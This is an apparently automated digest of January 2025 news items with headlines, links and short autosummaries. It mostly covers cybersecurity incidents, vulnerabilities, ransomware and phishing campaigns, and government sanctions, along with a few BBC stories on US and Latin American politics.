    Autosummary: Deportees seen at the US-Mexico border in Tijuana on 21 January An executive action, posted to the White House's website, argues that the measures are necessary to prevent undocumented immigrants from entering the US, "invading" US communities and "imposing billions of dollars of costs" on state and local governments. "


    Yes, Minister character is government's new AI assistant

    government
    2025-01-21 https://www.bbc.com/news/articles/cy48vl3p0nyo
    A new suite of AI tools for civil servants are named "Humphrey" after the scheming character. "

    Autosummary: Yes, Minister character is government's new AI assistant BBC Sir Humphrey Appleby was played by Sir Nigel Hawthorne in Yes, Minister Government workers will soon be given access to a set of tools powered by artificial intelligence (AI), named after a scheming parliamentary official from the classic sitcom Yes, Minister. "


    Cybersecurity jobs available right now: January 21, 2025

    ciber
    2025-01-21 https://www.helpnetsecurity.com/2025/01/21/cybersecurity-jobs-available-right-now-january-21-2025/

    CISO Sempra Infrastructure | USA | Hybrid – View job details As a CISO, you will develop and implement a robust information security strategy and program that aligns with the organization’s objectives and regulatory requirements. Assess and manage cybersecurity risks across the organization’s digital infrastructure, networks, and sensitive data. Implement risk mitigation strategies and ensure regular risk assessments and audits. Cloud Security Engineer UBX | Philippines | On-site – View job details As a Cloud … More

    The post Cybersecurity jobs available right now: January 21, 2025 appeared first on Help Net Security.

    "

    Autosummary: Senior Privacy Engineer – Incident Response, Devices & Services Trust & Privacy (DSTP) Amazon | USA | On-site – View job details As a Senior Privacy Engineer – Incident Response, Devices & Services Trust & Privacy (DSTP), you will own and support the design, development, implementation, and maintenance of DSTS’ privacy incident response infrastructure, tools, and processes. Senior Cybersecurity Specialist AVIO | Italy | Hybrid – View job details As a Senior Cybersecurity Specialist, you will analyze and identify cybersecurity threats, assess their severity, design and implement security solutions to protect IT systems and data, manage the security and protection of company data by securing applications and databases and ensuring systems are always up to date, and ensure that the company complies with standards, best practices, and internal policies related to IT security. Cyber Security Engineer IAG | New Zealand | Hybrid – View job details As a Cyber Security Engineer, you will develop and maintain attack emulation, detection, and response methodologies, create automations and API integrations using ServiceNow, and lead CTED BAU uplift activities within scope, time, and quality. Software Security Engineer Allego | France | Remote – View job details As a Software Security Engineer, you will be responsible for designing and updating the overall cybersecurity strategy, managing security improvement projects, overseeing the security testing strategy (including vulnerability scanning and penetration testing), performing regular threat analyses to stay updated on the current security landscape, and ensuring compliance with applicable laws and regulations. "


    Scam Yourself attacks: How social engineering is evolving

    financial
    2025-01-21 https://www.helpnetsecurity.com/2025/01/21/scam-yourself-attacks/

    We’ve entered a new era where verification must come before trust, and for good reason. Cyber threats are evolving rapidly, and one of the trends getting a fresh reboot in 2025 is the “scam yourself” attack. These aren’t your run-of-the-mill phishing scams. They are a sophisticated evolution of social engineering designed to deceive even the most tech-savvy users. Attackers exploit our routines, trust, overconfidence, and complacency to manipulate us into becoming unwitting accomplices in … More

    The post Scam Yourself attacks: How social engineering is evolving appeared first on Help Net Security.

    "

    Autosummary: The psychology behind the scam These scams are purposefully designed around deeply ingrained psychological tendencies: Default bias: We often stick to the default action such as just clicking “OK” or accepting pre-filled options, without questioning it. Often, the most effective defenses lie in returning to foundationally sound practices, leveraging security principles, disciplined processes, and fostering a culture of healthy skepticism. Additionally, adopting checklists for critical tasks, much like in engineering disciplines, helps reduce impulsive decisions and ensures systematic verification. "


    PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software Installers

    exploits
    2025-01-21 https://thehackernews.com/2025/01/pngplug-loader-delivers-valleyrat.html
    Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing "

    Autosummary: "


    CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits

    financial
    2025-01-21 https://thehackernews.com/2025/01/cert-ua-warns-of-cyber-scams-using-fake.html
    The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to "

    Autosummary: "In 2024, the most active cyber threat clusters were UAC-0010, UAC-0050, and UAC-0006, specializing in cyber espionage, financial theft, and information-psychological operations," the SSSCIP said. "


    Ransomware attackers are “vishing” organizations via Microsoft Teams

    financial exploits
    2025-01-21 https://www.helpnetsecurity.com/2025/01/21/ransomware-attackers-are-vishing-organizations-via-microsoft-teams-email-bombing/

    The “email bombing + posing as tech support via Microsoft Teams” combination is proving fruitful for two threat actors looking to deliver ransomware to organizations, and they seem to be ramping up their efforts. “Sophos MDR has observed more than 15 incidents involving these tactics in the past three months, with half of them in the past two weeks,” the company’s incident responders have warned today. The threat actors are social-engineering their way in To … More

    The post Ransomware attackers are “vishing” organizations via Microsoft Teams appeared first on Help Net Security.

    "

    Autosummary: Their advice for cybersecurity defenders includes: preventing or limiting which outside organizations can reach out to employees via M365 (i.e., Teams); setting up policies to make sure that remote access applications can only be installed by the organization’s tech support team; setting up monitoring of potentially malicious inbound Teams or Outlook traffic; raising employee awareness of the outlined tactics. "


    Ransomware gangs pose as IT support in Microsoft Teams phishing attacks

    financial exploits
    2025-01-21 https://www.bleepingcomputer.com/news/security/ransomware-gangs-pose-as-it-support-in-microsoft-teams-phishing-attacks/
    Ransomware gangs are increasingly adopting email bombing followed by posing as tech support in Microsoft Teams calls to trick employees into allowing remote control and installing malware that provides access to the company network. [...] "

    Autosummary: "


    Criminal IP Teams Up with OnTheHub for Digital Education Cybersecurity

    ciber
    2025-01-21 https://www.bleepingcomputer.com/news/security/criminal-ip-teams-up-with-onthehub-for-digital-education-cybersecurity/
    AI SPERA announced today that it has partnered with education platform OnTheHub to provide its integrated cybersecurity solution, Criminal IP, to students and educational institutions. [...] "

    Autosummary: "


    Medusa ransomware: what you need to know

    exploits ransomware
    2025-01-21 https://www.tripwire.com/state-of-security/medusa-ransomware-what-you-need-know
    Medusa is a ransomware-as-a-service (RaaS) platform that has targeted organisations around the world. Read more about it in my article on the Tripwire State of Security blog. "

    Autosummary: The largest proportion of Medusa's targets appear to be located in the United States, followed by the United Kingdom, Canada, Australia, France, and Italy. In addition to the dark web leak site, accessible via Tor, Medusa also publicises hacks and publishes stolen data on its public Telegram channel. It's noticeable that organisations based in Belarus, Kazakhstan, Kyrgyzstan, Russia, and Tajikistan do not appear in the list of victims. "


    Mirai Variant Murdoc_Botnet Exploits AVTECH IP Cameras and Huawei Routers

    exploits
    2025-01-21 https://thehackernews.com/2025/01/murdocbotnet-found-exploiting-avtech-ip.html
    Cybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc_Botnet. The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh "

    Autosummary: The DDoS activity has been found to single out telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services sectors. "


    13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks

    ciber
    2025-01-21 https://thehackernews.com/2025/01/13000-mikrotik-routers-hijacked-by.html
    A global network of about 13,000 hijacked Mikrotik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices. The activity "take[s] advantage of misconfigured DNS records to pass email protection techniques," Infoblox security researcher David Brunsdon said in a technical report published last week. "This "

    Autosummary: "Regardless of how they've been compromised, it seems as though the actor has been placing a script onto the [Mikrotik] devices that enables SOCKS (Secure Sockets), which allow the devices to operate as TCP redirectors," Brunsdon said. "


    CERT-UA warned of scammers impersonating the agency using fake AnyDesk requests

    financial
    2025-01-21 https://securityaffairs.com/173285/hacking/cert-ua-warned-of-scammers-impersonating-the-agency-using-fake-anydesk.html
    CERT-UA warned of scammers impersonating the agency, using fake AnyDesk requests to conduct fraudulent security audits. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of cyber scams involving threat actors impersonating the agency by sending fraudulent AnyDesk connection requests under the guise of security audits. CERT-UA pointed out that it uses the software AnyDesk […] "

    Autosummary: "


    Fake Homebrew Google ads target Mac users with malware

    exploits
    2025-01-21 https://www.bleepingcomputer.com/news/security/fake-homebrew-google-ads-target-mac-users-with-malware/
    Hackers are once again abusing Google ads to spread malware, using a fake Homebrew website to infect Macs and Linux devices with an infostealer that steals credentials, browser data, and cryptocurrency wallets. [...] "

    Autosummary: Fake Homebrew site Source: @ryanchenkie Security researcher JAMESWT found that the malware dropped in this case [VirusTotal] is Amos, a powerful infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and data stored on web browsers. "


    7-Zip fixes bug that bypasses Windows MoTW security warnings, patch now

    exploits
    2025-01-21 https://www.bleepingcomputer.com/news/security/7-zip-fixes-bug-that-bypasses-the-windows-motw-security-mechanism-patch-now/
    A high-severity vulnerability in the 7-Zip file archiver allows attackers to bypass the Mark of the Web (MotW) Windows security feature and execute code on users' computers when extracting malicious files from nested archives. [...] "

    Autosummary: For instance, in June, Microsoft addressed a Mark of the Web security bypass vulnerability (CVE-2024-38213) that DarkGate malware operators have exploited in the wild as a zero-day since March 2024 to circumvent SmartScreen protection and install malware camouflaged as installers for Apple iTunes, NVIDIA, Notion, and other legitimate software. "


    BBC Verify: Can Donald Trump really rename the Gulf of Mexico?

    latam
    2025-01-21 https://www.bbc.com/news/videos/c1lvm0j5vd8o
    The new US President wants to rename the Gulf of Mexico to the Gulf of America. How would that work? "

    Autosummary: "


    Planet WGS-804HPT Industrial Switch flaws could be chained to achieve remote code execution

    industry
    2025-01-20 https://securityaffairs.com/173237/security/wgs-804hpt-flaws.html
    Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. The Planet WGS-804HPT industrial switch is used in building and home automation networks to provide connectivity of Internet of things (IoT) devices, IP surveillance cameras, and wireless LAN network applications. This switch family is equipped with a […] "

    Autosummary: Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. "


    NDR’s role in a modern cybersecurity stack

    ciber
    2025-01-20 https://www.helpnetsecurity.com/2025/01/20/cybersecurity-stack-ndr-role-video/

    Attacks happen frequently on the security stack or within an enterprise. Often, they’re carried out by some unknown entity on the other side of the globe. You don’t know who you’re dealing with. You don’t know who they are. In this Help Net Security video, Jerry Mancini, NETSCOUT’s Senior Director, Office of the Enterprise CTO, discusses NDR’s role in a modern cybersecurity stack.

    The post NDR’s role in a modern cybersecurity stack appeared first on Help Net Security.

    "

    Autosummary: "


    DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence Collection

    exploits
    2025-01-20 https://thehackernews.com/2025/01/donot-team-linked-to-new-tanzeem.html
    The threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the "

    Autosummary: DoNot Team, also tracked as APT-C-35, Origami Elephant, SECTOR02, and Viceroy Tiger, is a hacking group believed to be of Indian origin, with historical attacks leveraging spear-phishing emails and Android malware families to gather information of interest. "


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]

    ciber
    2025-01-20 https://thehackernews.com/2025/01/thn-weekly-recap-top-cybersecurity_20.html
    As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with "

    Autosummary: This week's list includes — CVE-2025-21333, CVE-2025-21334, CVE-2025-21335 (Windows Hyper-V NT Kernel Integration VSP), CVE-2024-55591 (Fortinet), CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, CVE-2024-13159 (Ivanti Endpoint Manager), CVE-2024-7344 (Howyar Taiwan), CVE-2024-52320, CVE-2024-48871 (Planet Technology WGS-804HPT industrial switch), CVE-2024-12084 (Rsync), CVE-2024-57726, CVE-2024-57727, CVE-2024-57728 (SimpleHelp), CVE-2024-44243 (Apple macOS), CVE-2024-9042 (Kubernetes), CVE-2024-12365 (W3 Total Cache plugin), CVE-2025-23013 (Yubico), CVE-2024-57579, CVE-2024-57580, CVE-2024-57581, CVE-2024-57582 (Tenda AC18), CVE-2024-57011, CVE-2024-57012, CVE-2024-57013, CVE-2024-57014, CVE-2024-57015, CVE-2024-57016, CVE-2024-57017, CVE-2024-57018, CVE-2024-57019, CVE-2024-57020, CVE-2024-57021, CVE-2024-57022, CVE-2024-57023, CVE-2024-57024, CVE-2024-57025 (TOTOLINK X5000R), CVE-2025-22785 (ComMotion Course Booking System plugin), and 44 vulnerabilities in Wavlink AC3000 routers. 🔒 Tip of the Week Monitor, Detect, and Control Access with Free Solutions — In today's complex threat landscape, advanced, cost-effective solutions like Wazuh and LAPS offer powerful defenses for small-to-medium enterprises. Wazuh, an open-source SIEM platform, integrates with the Elastic Stack for real-time threat detection, anomaly monitoring, and log analysis, enabling you to spot malicious activities early. 🔧 Cybersecurity Tools AD-ThreatHunting: Detect and stop threats like password sprays, brute force attacks, and admin misuse with real-time alerts, pattern recognition, and smart analysis tools. Together, these tools provide a robust, multi-layered defense strategy, giving you the ability to detect, respond to, and mitigate threats efficiently without the high cost of enterprise solutions. It supports scanning installed packages, binaries, and source code across Linux, Windows, and Mac, while also generating SBOMs in SPDX and CycloneDX formats. The phishing kit is also called WikiKit owing to the fact that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page. "


    Microsoft fixes Windows Server 2022 bug breaking device boot

    exploits
    2025-01-20 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-server-2022-bug-breaking-device-boot/
    Microsoft has fixed a bug that was causing some Windows Server 2022 systems with two or more NUMA nodes to fail to start up. [...] "

    Autosummary: "


    Experts found new DoNot Team APT group’s Android malware

    exploits
    2025-01-20 https://securityaffairs.com/173257/apt/donot-team-android-malware.html
    Researchers linked the threat actor DoNot Team to a new Android malware that was employed in highly targeted cyber attacks. CYFIRMA researchers linked a recently discovered Android malware to the Indian APT group known as DoNot Team. The DoNot Team (aka APT-C-35 and Origami Elephant) has been active since 2016 and focuses on government and military organizations, […] "

    Autosummary: The DoNot Team (aka APT-C-35 and Origami Elephant) has been active since 2016 and focuses on government and military organizations, ministries of foreign affairs, and embassies in India, Pakistan, Sri Lanka, Bangladesh, and other South Asian countries. "


    Panama rejects Trump vow to "take back" Panama Canal

    latam
    2025-01-20 https://www.bbc.com/news/articles/c2egwzvp080o
    Donald Trump claims China is operating the key US trade route but Panama says it belongs to them. "

    Autosummary: "


    Week in review: AWS S3 data encrypted without ransomware, data of 15k Fortinet firewalls leaked

    exploits ransomware
    2025-01-19 https://www.helpnetsecurity.com/2025/01/19/week-in-review-aws-s3-data-encrypted-without-ransomware-data-of-15k-fortinet-firewalls-leaked/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Attackers are encrypting AWS S3 data without using ransomware A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. Configuration files for 15,000 Fortinet firewalls leaked. Are yours among them? A threat actor has leaked … More

    The post Week in review: AWS S3 data encrypted without ransomware, data of 15k Fortinet firewalls leaked appeared first on Help Net Security.

    "

    Autosummary: Balancing usability and security in the fight against identity-based attacks In this Help Net Security interview, Adam Bateman, CEO of Push Security, talks about the rise in identity-based attacks, how they’re becoming more sophisticated each year, and how AI and ML are both fueling these threats and helping to defend against them. Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Attackers are encrypting AWS S3 data without using ransomware A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. "


    Colombian drug gang violence kills 60 people

    latam
    2025-01-19 https://www.bbc.com/news/articles/cew5kn9xkp8o
    Attacks between guerrilla groups have also seen thousands displaced from the country's Catatumbo region. "

    Autosummary: "In some communities in the region, food shortages are beginning to be reported, affecting local communities," the Ombudsman's Office wrote in a statement on Saturday, adding that thousands of people are believed to have been displaced by the violence. "


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 29

    exploits
    2025-01-19 https://securityaffairs.com/173232/malware/security-affairs-malware-newsletter-round-29.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection Ransomware on ESXi: The mechanization of virtualized attacks FunkSec – Alleged Top Ransomware Group Powered by AI Abusing AWS Native Services: Ransomware Encrypting S3 Buckets […] "

    Autosummary: "


    Hidden tunnel on US-Mexico border to be sealed

    latam
    2025-01-19 https://www.bbc.com/news/articles/c98y4n853vmo
    Security has been ramped up on both sides of the border ahead of the inauguration of Donald Trump. "

    Autosummary: "


    U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Silk Typhoon

    ciber
    2025-01-18 https://thehackernews.com/2025/01/us-sanctions-chinese-cybersecurity-firm.html
    The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. "People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent "

    Autosummary: Earlier this week, Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), said "China's sophisticated and well-resourced cyber program represents the most serious and significant cyber threat to our nation, and in particular, U.S. critical infrastructure. "


    TikTok says it will "go dark" on Sunday without US government action

    government
    2025-01-18 https://www.bbc.com/news/articles/clyeer3qp12o
    The Supreme Court earlier upheld a law that would ban the video app in the US unless its Chinese parent-company sells it. "

    Autosummary: One creator, Nicole Bloomgarden, told the BBC not being on TikTok would amount to a significant salary cut, while another, Erika Thompson, said the educational content on the platform would be the "biggest loss" for the community. TikTok says it will "go dark" on Sunday without US government action Watch: TikTokers' say goodbye to their "Chinese spy" as they move to RedNote TikTok has said it will be forced to "go dark" in the US on Sunday unless the government intervenes before a ban takes effect. "


    U.S. Treasury Sanctions Chinese cybersecurity firm and actor over federal agency breach tied to Salt Typhoon

    ciber
    2025-01-18 https://securityaffairs.com/173209/intelligence/u-s-treasury-sanctioned-cybersecurity-firm-and-shanghai-cyber-actor-linked-salt-typhoon.html
    The U.S. Treasury’s OFAC sanctioned a Chinese cybersecurity firm and a Shanghai cyber actor for ties to Salt Typhoon and a federal agency breach. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned Chinese firm Sichuan Juxinhe Network Technology Co., LTD., for its involvement in the activities of the Salt Typhoon APT group, […] "

    Autosummary: The U.S. Treasury’s OFAC sanctioned a Chinese cybersecurity firm and a Shanghai cyber actor for ties to Salt Typhoon and a federal agency breach. "


    EU takes decisive action on healthcare cybersecurity

    ciber
    2025-01-17 https://www.helpnetsecurity.com/2025/01/17/eu-action-plan-healthcare-cybersecurity/

    The Commission has presented an EU action plan aimed at strengthening the cybersecurity of hospitals and healthcare providers. The initiative is an essential step in shielding the healthcare sector from cyber threats. Digitalization is revolutionizing healthcare, enabling better patient services through innovations such as electronic health records, telemedicine, and AI-driven diagnostics. However, cyberattacks can delay medical procedures, create gridlock in emergency rooms, and disrupt vital services, which, in severe cases, could directly impact the lives … More

    The post EU takes decisive action on healthcare cybersecurity appeared first on Help Net Security.

    "

    Autosummary: The action plan proposes, among others, for ENISA, the EU agency for cybersecurity, to establish a pan-European Cybersecurity Support Centre for hospitals and healthcare providers, providing them with tailored guidance, tools, services, and training. However, cyberattacks can delay medical procedures, create gridlock in emergency rooms, and disrupt vital services, which, in severe cases, could directly impact the lives of Europeans. "


    New "Sneaky 2FA" Phishing Kit Targets Microsoft 365 Accounts with 2FA Code Bypass

    financial
    2025-01-17 https://thehackernews.com/2025/01/new-sneaky-2fa-phishing-kit-targets.html
    Cybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that's capable of targeting Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting "

    Autosummary: " "While User-Agent transitions occasionally happen in legitimate situations (e.g., authentication initiated in desktop applications that launch a web browser or WebView to handle MFA), the specific sequence of User-Agents used by Sneaky 2FA does not correspond to a realistic scenario, and offers a high-fidelity detection of the kit." "


    How Russian hackers went after NGOs’ WhatsApp accounts

    rusia-ucrania
    2025-01-17 https://www.helpnetsecurity.com/2025/01/17/star-blizzard-whatsapp-phishing-ngos/

    Star Blizzard, a threat actor tied to the Russian Federal Security Service (FSB), was spotted attempting to compromise targets’ WhatsApp accounts through a clever phishing campaign. The campaign The campaign started with a spear-phishing email that was made to look like it was sent by a US government official. “We have established a private WhatsApp group to facilitate discussions regarding the latest non-governmental initiatives aimed at supporting Ukraine. This platform will also serve as a … More

    The post How Russian hackers went after NGOs’ WhatsApp accounts appeared first on Help Net Security.

    "

    Autosummary: The spoofed WhatsApp page, with the QR code obscured (Source: Microsoft Threat Intelligence) “However, this QR code is actually used by WhatsApp to connect an account to a linked device and/or the WhatsApp Web portal,” Microsoft’s threat analysts explained. "


    Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation

    exploits
    2025-01-17 https://thehackernews.com/2025/01/critical-flaws-in-wgs-804hpt-switches.html
    Cybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. "These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker "

    Autosummary: "


    Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation

    exploits
    2025-01-17 https://thehackernews.com/2025/01/python-based-bots-exploiting-php.html
    Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks "

    Autosummary: "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "


    U.S. CISA adds Aviatrix Controllers vulnerability to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-17 https://securityaffairs.com/173189/hacking/u-s-cisa-aviatrix-controllers-vulnerability-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Aviatrix Controllers vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical Aviatrix Controllers OS Command Injection vulnerability, tracked as CVE-2024-50603 (CVSS score of 10) to its Known Exploited Vulnerabilities (KEV) catalog. The flaw impacts Aviatrix Controller pre-7.1.4191 and 7.2.x […] "

    Autosummary: "


    US sanctions Chinese firm, hacker behind telecom and Treasury hacks

    Telcos
    2025-01-17 https://www.bleepingcomputer.com/news/security/us-sanctions-chinese-firm-hacker-behind-telecom-and-treasury-hacks/
    The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) has sanctioned Yin Kecheng, a Shanghai-based hacker for his role in the recent Treasury breach and a company associated with the Salt Typhoon threat group. [...] "

    Autosummary: Last week, the Treasury announced that the operation was conducted by “Silk Typhoon” (a.k.a. Hafnium), a team of skilled cyberspies who target a broad range of organizations in the U.S., Japan, Australia, and Vietnam. "


    FCC orders telecoms to secure their networks after Salt Typhoon hacks

    Telcos
    2025-01-17 https://www.bleepingcomputer.com/news/security/fcc-orders-telecoms-to-secure-their-networks-after-salt-tyhpoon-hacks/
    The Federal Communications Commission (FCC) has ordered U.S. telecommunications carriers to secure their networks following last year's Salt Typhoon security breaches. [...] "

    Autosummary: Anne Neuberger, the White House's deputy national security adviser for cyber and emerging technologies, told reporters that the hackers breached nine U.S. carriers (including Windstream, Charter, and Consolidated Communications) and telecom companies in dozens of other countries. "


    WhatsApp spear phishing campaign uses QR codes to add device

    financial
    2025-01-17 https://www.malwarebytes.com/blog/news/2025/01/whatsapp-spear-phishing-campaign-uses-qr-codes-to-add-device
    A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members... "

    Autosummary: With that access the group can read the messages in their WhatsApp account and use existing browser plugins, particularly those designed for exporting WhatsApp messages from an account accessed via WhatsApp Web. How to stay safe These spear phishing campaigns are highly targeted and you’ll probably never see an invite to this group. "


    Otelier data breach exposes info, hotel reservations of millions

    financial
    2025-01-17 https://www.bleepingcomputer.com/news/security/otelier-data-breach-exposes-info-hotel-reservations-of-millions/
    Hotel management platform Otelier suffered a data breach after threat actors breached its Amazon S3 cloud storage to steal millions of guests' personal information and reservations for well-known hotel brands like Marriott, Hilton, and Hyatt. [...] "

    Autosummary: " Otelier, previously known as MyDigitalOffice, is a cloud-based hotel management solution used by over 10,000 hotels worldwide to manage reservations, transactions, nightly reports, and invoicing. "Once we were made aware of this incident involving Otelier, we immediately contacted the vendor, which works with numerous hotel companies, and confirmed that they were working with cyber security experts to investigate a security incident that impacted their systems," a Marriott spokesperson told BleepingComputer. "


    Watch: Firefighters rescue riders from Chilean Ferris wheel

    latam
    2025-01-17 https://www.bbc.com/news/videos/czx8898e8qjo
    Firefighters in Viña del Mar rescued more than 35 revellers trapped aboard a malfunctioning Ferris wheel. "

    Autosummary: "


    Homes and roads swamped by Brazil floodwaters

    latam
    2025-01-17 https://www.bbc.com/news/videos/ckgrrx377xpo
    A state of emergency has been declared in southern Brazil after heavy rain caused flooding in coastal cities. "

    Autosummary: "


    How CISOs can elevate cybersecurity in boardroom discussions

    ciber
    2025-01-16 https://www.helpnetsecurity.com/2025/01/16/ross-young-team8-cybersecurity-boardroom-discussions/

    Ross Young is the CISO in residence at Team8 and the creator of the OWASP Threat and Safeguard Matrix (TaSM). In this interview, he shares his perspective on how cybersecurity professionals can tailor their presentations to the board, aligning security strategies with business priorities. He also discusses common misconceptions that boards have about cybersecurity and offers practical advice on building lasting relationships with executives to ensure cybersecurity stays front and center in ongoing business discussions. … More

    The post How CISOs can elevate cybersecurity in boardroom discussions appeared first on Help Net Security.

    "

    Autosummary: While investment is important, organizations need coordinated effort between operational management (first line), risk management functions (second line), and internal audit (third line) to create an effective security posture. While the security team typically operates in the second line of defense alongside risk management and compliance functions, primary responsibility for security begins with first-line operational teams, particularly developers securing their applications. The first line of defense, including developers and operational staff, must actively implement security practices in their daily work, regardless of certification status. "


    Python-Based Malware Powers RansomHub Ransomware to Exploit Network Flaws

    exploits ransomware
    2025-01-16 https://thehackernews.com/2025/01/python-based-malware-powers-ransomhub.html
    Cybersecurity researchers have detailed an attack that involved a threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged this access to deploy the RansomHub ransomware throughout the target network. According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloaded named "

    Autosummary: As highlighted by Halcyon earlier this month, some of the other tools deployed prior to ransomware deployment include those responsible for: disabling Endpoint Detection and Response (EDR) solutions using EDRSilencer and Backstab; stealing credentials using LaZagne; compromising email accounts by brute-forcing credentials using MailBruter; maintaining stealthy access and delivering additional payloads using Sirefef and Mediyes. Ransomware campaigns have also been observed targeting Amazon S3 buckets by leveraging Amazon Web Services' Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt victim data. "


    PlugX malware deleted from thousands of systems by FBI

    exploits
    2025-01-16 https://www.malwarebytes.com/blog/news/2025/01/plugx-malware-deleted-from-thousands-of-systems-by-fbi
    The FBI has announced it's deleted PlugX malware from approximately 4,258 US-based computers and networks. "

    Autosummary: US Attorney Jacqueline Romero for the Eastern District of Pennsylvania commented: “This wide-ranging hack and long-term infection of thousands of Windows-based computers, including many home computers in the United States, demonstrates the recklessness and aggressiveness of PRC state-sponsored hackers.” "


    Smashing Security podcast #400: Hacker games, AI travel surveillance, and 25 years of IoT

    industry
    2025-01-16 https://grahamcluley.com/smashing-security-podcast-400/
    The video game Path of Exile 2 suffers a security breach, we explore the issues of using predictive algorithms in travel surveillance systems, and the very worst IoT devices are put on show in Las Vegas. Oh, and has Elon Musk accidentally revealed he cheats at video games? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire's Dave Bittner. "

    Autosummary: "


    New UEFI Secure Boot bypass vulnerability discovered (CVE-2024-7344)

    exploits
    2025-01-16 https://www.helpnetsecurity.com/2025/01/16/uefi-secure-boot-bypass-vulnerability-cve-2024-7344/

    ESET researchers have identified a vulnerability (CVE-2024-7344) impacting most UEFI-based systems, which allows attackers to bypass UEFI Secure Boot. The issue was found in a UEFI application signed with Microsoft’s “Microsoft Corporation UEFI CA 2011” third-party certificate. Exploiting this vulnerability enables the execution of untrusted code during system boot, allowing attackers to deploy malicious UEFI bootkits, such as Bootkitty or BlackLotus, even on systems with UEFI Secure Boot enabled, regardless of the operating system. Impacted … More

    The post New UEFI Secure Boot bypass vulnerability discovered (CVE-2024-7344) appeared first on Help Net Security.

    "

